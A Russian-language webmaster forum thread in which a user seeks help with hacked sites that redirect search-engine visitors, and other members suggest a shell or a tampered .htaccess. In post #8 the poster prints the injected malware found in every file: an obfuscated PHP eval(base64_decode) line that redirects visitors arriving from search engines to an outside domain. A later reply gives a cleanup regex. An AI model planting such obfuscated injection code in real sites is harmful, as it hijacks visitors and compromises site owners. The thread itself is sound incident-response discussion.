Вирус редиректит с поисковиков.

12
Sutener
На сайте с 24.04.2009
Offline
128
1322

На сайте(Prestashop) был вирус- ожил после замены всех файлов на родные(установочные), но теперь редиректит с поисковиков(на разные сайты. в основном польские)...

И только сейчас заметил, что такая же лажа и с другими сайтами(друпал, Question2Answer и ещё одна преста) на этом акке(хостинг). На другом аккаунте такой лажи нет.

Как и где найти эту заразу? Помогите, пожалуйста:(

Erste-Hilfe Kurs in München https://blr-akademie.de/ für Führerschein und Betriebe *.com *.bat *.bat *.яня *.bat *.яня *.com *.bat
SF
На сайте с 12.11.2011
Offline
103
#1

Была тажа фигня на DLE сайте.Весь мозг сломал когда искал,в итоге оказалась зараза в файле переходов.Если такой имеется сноси или обновляй

Sutener
На сайте с 24.04.2009
Offline
128
#2

тему про дле уже видел. спасибо.

у меня такая лажа на всех сайтах аккаунта- движки разные. Дле нет.

SF
На сайте с 12.11.2011
Offline
103
#3

Значит шелл

facegrodno
На сайте с 02.05.2009
Offline
45
#4

подменил .htaccess

проверяйте. будет в его начале и в конце, через несколько пустых строк

просите хостеров, чтобы почистили, либо бэкап полный делайте

у этой гадости нет привязки к движку. всех заражает.

сам прошел через такое недели 2 назад

Партнерка кино и развлекательное (http://u.to/BrgYAQ) Новая Кинопартнерка (http://goo.gl/tXuaC) NEW Май 2012
R
На сайте с 24.01.2008
Offline
180
#5

Стучите в асю (в профиле), поможем избавиться от вирусов, проверим на шеллы, дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
R
На сайте с 13.04.2009
Offline
160
#6

Для начала нужно просканировать все файлы, если доступа по ssh нет, то выкачивайте и ищите например через notepad++.

http://rushter.com/2011/poisk-shellov-na-sajjte/

~~~~~~~~~~~~~~~~

А так я помогаю:

Поиск и устранение последствий от 50$.

Поиск и устранение уявимости от 100$.

Если интересует - пм.

Sutener
На сайте с 24.04.2009
Offline
128
#7
facegrodno:
подменил .htaccess

проверяйте. будет в его начале и в конце, через несколько пустых строк
просите хостеров, чтобы почистили, либо бэкап полный делайте

у этой гадости нет привязки к движку. всех заражает.
сам прошел через такое недели 2 назад

Да, было!😡 Спасибо:)

почистил. Не помогло...😒

Sutener
На сайте с 24.04.2009
Offline
128
#8

Нашёл. Ушшло много времени, потому что этот код находится в начале, а я смотрел середину и конец(не ожидал такой наглости).

Но, йопть, этот код во всех файлах это же стопицот тыщ страниц... как почистить?

а вот эта кака

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));
siv1987
На сайте с 02.04.2009
Offline
427
#9
Sutener:
Но, йопть, этот код во всех файлах это же стопицот тыщ страниц... как почистить?

элементарно, поиском и заменой по файлам

'/<\?php\s*eval\(.+?\)\);/is', "<?php\n"
Sutener
На сайте с 24.04.2009
Offline
128
#10

для этого по ssh входить нужно? нет такой возможности...

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий